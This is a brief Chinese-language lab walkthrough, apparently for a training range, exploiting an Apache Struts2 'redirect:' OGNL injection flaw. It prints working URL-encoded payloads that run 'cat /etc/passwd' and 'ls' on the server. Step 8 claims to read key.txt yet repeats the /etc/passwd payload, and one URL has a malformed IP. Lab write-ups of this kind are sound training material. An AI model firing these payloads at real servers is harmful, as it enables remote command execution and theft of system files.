墨者學習
By/shy014
1.在墨者學院找到該靶場並點擊啓動靶場
2.找到後綴爲.action的網http://219.153.49.228:49162/index.action
3.使用http://219.1549.228:49162/index.action?redirect:${1+1} 測試漏洞是否存在
4.使用url編碼http://219.153.49.228:49162/index.action?redirect:%24%7B1%2b1%7D,redirect執行了表達式,確認存在漏洞。
5.使用執行任意命令的EXP,使用之前需要經過URL編碼
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
6.使用ls命令讀取文件
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'ls'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
7.將文件下載並打開,發現key.txt文件
8.讀取key.txt的內容,依舊需要url編碼
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
二.使用struts2漏洞檢測工具
1.使用工具進行檢測,發現存在漏洞
2.執行ls命令
3.讀取key.txt值
4.提交key